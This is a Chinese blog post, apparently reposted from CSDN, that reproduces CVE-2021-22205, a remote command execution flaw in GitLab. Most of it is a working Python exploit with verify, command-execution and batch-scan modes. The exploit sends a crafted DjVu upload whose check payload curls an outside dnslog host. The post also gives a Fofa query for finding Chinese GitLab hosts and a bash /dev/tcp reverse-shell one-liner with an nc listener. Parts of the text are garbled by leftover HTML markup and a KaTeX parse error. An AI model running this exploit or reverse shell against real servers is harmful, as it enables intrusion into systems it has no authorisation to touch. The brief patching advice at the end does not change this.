CVE-2021-22205——Gitlab 远程命令执行漏洞复现

本文阅读 1 分钟
首页 安全分享,WEB安全 正文

sudo docker run –detach </span> –hostname gitlab.example.com </span> –publish 443:443 –publish 80:80 </span> –name gitlab </span> –restart always </span> –volume KaTeX parse error: Undefined control sequence: < at position 335: …n punctuation">̲<̲/span> <span …GITLAB_HOME/logs:/var/log/gitlab </span> –volume $GITLAB_HOME/data:/var/opt/gitlab </span> gitlab/gitlab-ce:13.9.1-ce.0

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11

Fofa语法

title="GitLab" && country="CN"

 
 
 
 
  1

img

漏洞利用脚本

https://github.com/Al1ex/CVE-2021-22205

 
 
 
 
  1

img img

img

反弹Shell

如果目标主机出网的话,可以尝试反弹Shell

使用linux命令反弹shell

bash -i >& /dev/tcp/ip/port 0>&1

 
 
 
 
  1

nc监听10000端口

nc -lvp 10000

 
 
 
 
  1

成功上线 img

执行命令RCE img

Exp

import requests
from bs4 import BeautifulSoup
import base64
import random
import sys
import os
import argparse

requests.packages.urllib3.disable_warnings()

def title(): print(""" / <span class="token punctuation"></span> <span class="token punctuation"></span> / / <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation"></span> / <span class="token punctuation"></span> <span class="token punctuation"></span>/ <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation"></span><span class="token punctuation">|</span><span class="token variable"></span> <span class="token punctuation"></span><span class="token punctuation">|</span><span class="token variable"></span> <span class="token punctuation"></span> / <span class="token punctuation"></span><span class="token punctuation">|</span> <span class="token variable"></span><span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation"></span> <span class="token punctuation"></span> / /<span class="token punctuation">|</span> <span class="token punctuation">|</span> ) <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation">|</span>) <span class="token punctuation">|</span> <span class="token punctuation">|</span> ) <span class="token punctuation">|</span> ) <span class="token punctuation">|</span> ) <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation"></span> <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation"></span> <span class="token variable">V</span> / <span class="token punctuation">|</span> <span class="token punctuation">|</span><span class="token punctuation">|</span>/ /<span class="token punctuation">|</span> <span class="token punctuation">|</span><span class="token variable">_</span><span class="token punctuation">|</span> / /<span class="token punctuation">|</span> <span class="token punctuation">|</span><span class="token variable"></span>/ / / / / /<span class="token punctuation">|</span> <span class="token punctuation">|</span><span class="token punctuation">|</span> <span class="token punctuation">|</span>) <span class="token punctuation">|</span> <span class="token punctuation"></span> <span class="token punctuation">|</span> <span class="token punctuation"></span>/ <span class="token punctuation">|</span><span class="token variable"></span><span class="token punctuation">|</span> <span class="token punctuation">|</span><span class="token punctuation">|</span><span class="token punctuation"></span>/<span class="token variable"></span><span class="token punctuation">|</span><span class="token variable">_</span><span class="token punctuation">|</span> <span class="token punctuation">|</span><span class="token punctuation">|</span><span class="token variable"></span><span class="token punctuation">|</span><span class="token punctuation">|</span><span class="token punctuation"></span>/<span class="token punctuation">|</span><span class="token variable">_</span>/</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span>

<span class="token variable">Author</span><span class="token punctuation">:</span><span class="token variable">Al1ex</span><span class="token punctuation">@</span><span class="token variable">Heptagram</span>
                            <span class="token variable">Github</span><span class="token punctuation">:</span><span class="token variable">https</span><span class="token punctuation">:</span><span class="token punctuation">/</span><span class="token punctuation">/</span><span class="token variable">github</span><span class="token punctuation">.</span><span class="token variable">com</span><span class="token punctuation">/</span><span class="token variable">Al1ex</span>                             
    <span class="token string">""</span><span class="token punctuation">"</span><span class="token punctuation">)</span>
<span class="token variable">print</span><span class="token punctuation">(</span><span class="token string">''</span><span class="token punctuation">'</span>
    <span class="token variable">验证模式:python</span> <span class="token variable">CVE-</span><span class="token number">2021</span><span class="token variable">-</span><span class="token number">22205.</span><span class="token variable">py</span> <span class="token variable">-v</span> <span class="token boolean">true</span> <span class="token variable">-t</span> <span class="token variable">target_url</span> 
    <span class="token variable">攻击模式:python</span> <span class="token variable">CVE-</span><span class="token number">2021</span><span class="token variable">-</span><span class="token number">22205.</span><span class="token variable">py</span> <span class="token variable">-a</span> <span class="token boolean">true</span> <span class="token variable">-t</span> <span class="token variable">target_url</span> <span class="token variable">-c</span> <span class="token variable">command</span> 
    <span class="token variable">批量检测:python</span> <span class="token variable">CVE-</span><span class="token number">2021</span><span class="token variable">-</span><span class="token number">22205.</span><span class="token variable">py</span> <span class="token variable">-s</span> <span class="token boolean">true</span> <span class="token variable">-f</span> <span class="token variable">file</span> 
    <span class="token string">''</span><span class="token punctuation">'</span><span class="token punctuation">)</span>

def check(target_url): session = requests.Session() try: req1 = session.get(target_url.strip("/") + “/users/sign_in”, verify=False) soup = BeautifulSoup(req1.text, features=“lxml”) token = soup.findAll(‘meta’)[16].get(“content”) data = “rn------WebKitFormBoundaryIMv3mxRg59TkFSX5rnContent-Disposition: form-data; name=“file”; filename=“test.jpg”rnContent-Type: image/jpegrnrnAT&TFORMx00x00x03xafDJVMDIRMx00x00x00.x81x00x02x00x00x00Fx00x00x00xacxffxffxdexbfx99 !xc8x91Nxebx0cx07x1fxd2xdax88xe8kxe6Dx0f,qx02xeeIxd3nx95xbdxa2xc3”?FORMx00x00x00^DJVUINFOx00x00x00nx00x08x00x08x18x00dx00x16x00INCLx00x00x00x0fshared_anno.iffx00BG44x00x00x00x11x00Jx01x02x00x08x00x08x8axe6xe1xb17xd9*x89x00BG44x00x00x00x04x01x0fxf9x9fBG44x00x00x00x02x02nFORMx00x00x03x07DJVIANTax00x00x01P(metadatant(Copyright “\n” . qx{curl whoami.82sm53.dnslog.cn} . \n" b “) ) nrn------WebKitFormBoundaryIMv3mxRg59TkFSX5–rnrn” headers = { “User-Agent”: “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36”, “Connection”: “close”, “Content-Type”: “multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5”, “X-CSRF-Token”: f"{token}", “Accept-Encoding”: “gzip, deflate”} flag = ‘Failed to process image’ req2 = session.post(target_url.strip("/") + “/uploads/user”, data=data, headers=headers, verify=False) if flag in req2.text: print("[+] 目标 {} 存在漏洞".format(target_url)) else: print("[-] 目标 {} 不存在漏洞".format(target_url)) except Exception as e: print(e)

def attack(target_url,command): session = requests.Session() try: req1 = session.get(target_url.strip("/") + “/users/sign_in”, verify=False) soup = BeautifulSoup(req1.text, features=“lxml”) token = soup.findAll(‘meta’)[16].get(“content”) data = “rn------WebKitFormBoundaryIMv3mxRg59TkFSX5rnContent-Disposition: form-data; name=“file”; filename=“test.jpg”rnContent-Type: image/jpegrnrnAT&TFORMx00x00x03xafDJVMDIRMx00x00x00.x81x00x02x00x00x00Fx00x00x00xacxffxffxdexbfx99 !xc8x91Nxebx0cx07x1fxd2xdax88xe8kxe6Dx0f,qx02xeeIxd3nx95xbdxa2xc3”?FORMx00x00x00^DJVUINFOx00x00x00nx00x08x00x08x18x00dx00x16x00INCLx00x00x00x0fshared_anno.iffx00BG44x00x00x00x11x00Jx01x02x00x08x00x08x8axe6xe1xb17xd9*x89x00BG44x00x00x00x04x01x0fxf9x9fBG44x00x00x00x02x02nFORMx00x00x03x07DJVIANTax00x00x01P(metadatant(Copyright “\n” . qx{"+ command +"} . \n" b “) ) nrn------WebKitFormBoundaryIMv3mxRg59TkFSX5–rnrn” headers = { “User-Agent”: “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36”, “Connection”: “close”, “Content-Type”: “multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5”, “X-CSRF-Token”: f"{token}", “Accept-Encoding”: “gzip, deflate”} flag = ‘Failed to process image’ req2 = session.post(target_url.strip("/") + “/uploads/user”, data=data, headers=headers, verify=False) if flag in req2.text: print("[+] 目标 {} 存在漏洞".format(target_url)) print("[+] 请到dnslog或主机检查执行结果") else: print("[-] 目标 {} 不存在漏洞".format(target_url)) except Exception as e: print(e)

def scan(file): for url_link in open(file, ‘r’, encoding=‘utf-8’): if url_link.strip() != ‘’: url_path = format_url(url_link.strip()) check(url_path)

def format_url(url): try: if url[:4] != “http”: url = “https://” + url url = url.strip() return url except Exception as e: print(‘URL 错误 {0}’.format(url))

def main(): parser = argparse.ArgumentParser(description=‘GitLab < 13.10.3 RCE’) parser.add_argument(’-v’, ‘–verify’, type=bool,help=’ 验证模式 ‘) parser.add_argument(’-t’, ‘–target’, type=str, help=’ 目标URL ')

<span class="token variable">parser</span><span class="token punctuation">.</span><span class="token variable">add_argument</span><span class="token punctuation">(</span><span class="token string">'-a'</span><span class="token punctuation">,</span> <span class="token string">'--attack'</span><span class="token punctuation">,</span> <span class="token variable">type</span><span class="token punctuation">=</span><span class="token variable">bool</span><span class="token punctuation">,</span> <span class="token variable">help</span><span class="token punctuation">=</span><span class="token string">' 攻击模式 '</span><span class="token punctuation">)</span>
<span class="token variable">parser</span><span class="token punctuation">.</span><span class="token variable">add_argument</span><span class="token punctuation">(</span><span class="token string">'-c'</span><span class="token punctuation">,</span> <span class="token string">'--command'</span><span class="token punctuation">,</span> <span class="token variable">type</span><span class="token punctuation">=</span><span class="token variable">str</span><span class="token punctuation">,</span> <span class="token variable">help</span><span class="token punctuation">=</span><span class="token string">' 执行命令 '</span><span class="token punctuation">)</span>

<span class="token variable">parser</span><span class="token punctuation">.</span><span class="token variable">add_argument</span><span class="token punctuation">(</span><span class="token string">'-s'</span><span class="token punctuation">,</span> <span class="token string">'--scan'</span><span class="token punctuation">,</span> <span class="token variable">type</span><span class="token punctuation">=</span><span class="token variable">bool</span><span class="token punctuation">,</span> <span class="token variable">help</span><span class="token punctuation">=</span><span class="token string">' 批量模式 '</span><span class="token punctuation">)</span>
<span class="token variable">parser</span><span class="token punctuation">.</span><span class="token variable">add_argument</span><span class="token punctuation">(</span><span class="token string">'-f'</span><span class="token punctuation">,</span> <span class="token string">'--file'</span><span class="token punctuation">,</span> <span class="token variable">type</span><span class="token punctuation">=</span><span class="token variable">str</span><span class="token punctuation">,</span> <span class="token variable">help</span><span class="token punctuation">=</span><span class="token string">' 文件路径 '</span><span class="token punctuation">)</span>


<span class="token variable">args</span> <span class="token punctuation">=</span> <span class="token variable">parser</span><span class="token punctuation">.</span><span class="token variable">parse_args</span><span class="token punctuation">(</span><span class="token punctuation">)</span>

<span class="token variable">verify_model</span> <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">verify</span>
<span class="token variable">target_url</span>   <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">target</span>

<span class="token variable">attack_model</span> <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">attack</span>
<span class="token variable">command</span> <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">command</span>

<span class="token variable">scan_model</span> <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">scan</span>
<span class="token variable">file</span> <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">file</span>

<span class="token variable">if</span> <span class="token variable">verify_model</span> <span class="token variable">is</span> <span class="token variable">True</span> <span class="token variable">and</span> <span class="token variable">target_url</span> <span class="token punctuation">!</span><span class="token punctuation">=</span><span class="token variable">None</span><span class="token punctuation">:</span>
    <span class="token variable">check</span><span class="token punctuation">(</span><span class="token variable">target_url</span><span class="token punctuation">)</span>
<span class="token variable">elif</span> <span class="token variable">attack_model</span> <span class="token variable">is</span> <span class="token variable">True</span> <span class="token variable">and</span> <span class="token variable">target_url</span> <span class="token punctuation">!</span><span class="token punctuation">=</span> <span class="token variable">None</span> <span class="token variable">and</span> <span class="token variable">command</span> <span class="token punctuation">!</span><span class="token punctuation">=</span> <span class="token variable">None</span><span class="token punctuation">:</span>
    <span class="token variable">attack</span><span class="token punctuation">(</span><span class="token variable">target_url</span><span class="token punctuation">,</span><span class="token variable">command</span><span class="token punctuation">)</span>
<span class="token variable">elif</span> <span class="token variable">scan_model</span> <span class="token variable">is</span> <span class="token variable">True</span> <span class="token variable">and</span> <span class="token variable">file</span> <span class="token punctuation">!</span><span class="token punctuation">=</span> <span class="token variable">None</span><span class="token punctuation">:</span>
    <span class="token variable">scan</span><span class="token punctuation">(</span><span class="token variable">file</span><span class="token punctuation">)</span>
<span class="token variable">else</span><span class="token punctuation">:</span>
    <span class="token variable">sys</span><span class="token punctuation">.</span><span class="token variable">exit</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span>

if name == ‘main’: title() main()

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52
  • 53
  • 54
  • 55
  • 56
  • 57
  • 58
  • 59
  • 60
  • 61
  • 62
  • 63
  • 64
  • 65
  • 66
  • 67
  • 68
  • 69
  • 70
  • 71
  • 72
  • 73
  • 74
  • 75
  • 76
  • 77
  • 78
  • 79
  • 80
  • 81
  • 82
  • 83
  • 84
  • 85
  • 86
  • 87
  • 88
  • 89
  • 90
  • 91
  • 92
  • 93
  • 94
  • 95
  • 96
  • 97
  • 98
  • 99
  • 100
  • 101
  • 102
  • 103
  • 104
  • 105
  • 106
  • 107
  • 108
  • 109
  • 110
  • 111
  • 112
  • 113
  • 114
  • 115
  • 116
  • 117
  • 118
  • 119
  • 120

漏洞防范及修复

官方修复 目前官方已发布新版本修复了该漏洞,请受影响的用户尽快升级至最新版本进行防护,官方下载链接:

https://about.gitlab.com/update/

 
 
 
 
  1

临时防护措施

使用白名单限制对Web端口的访问
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/wangyuxiang946/article/details/121275954
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复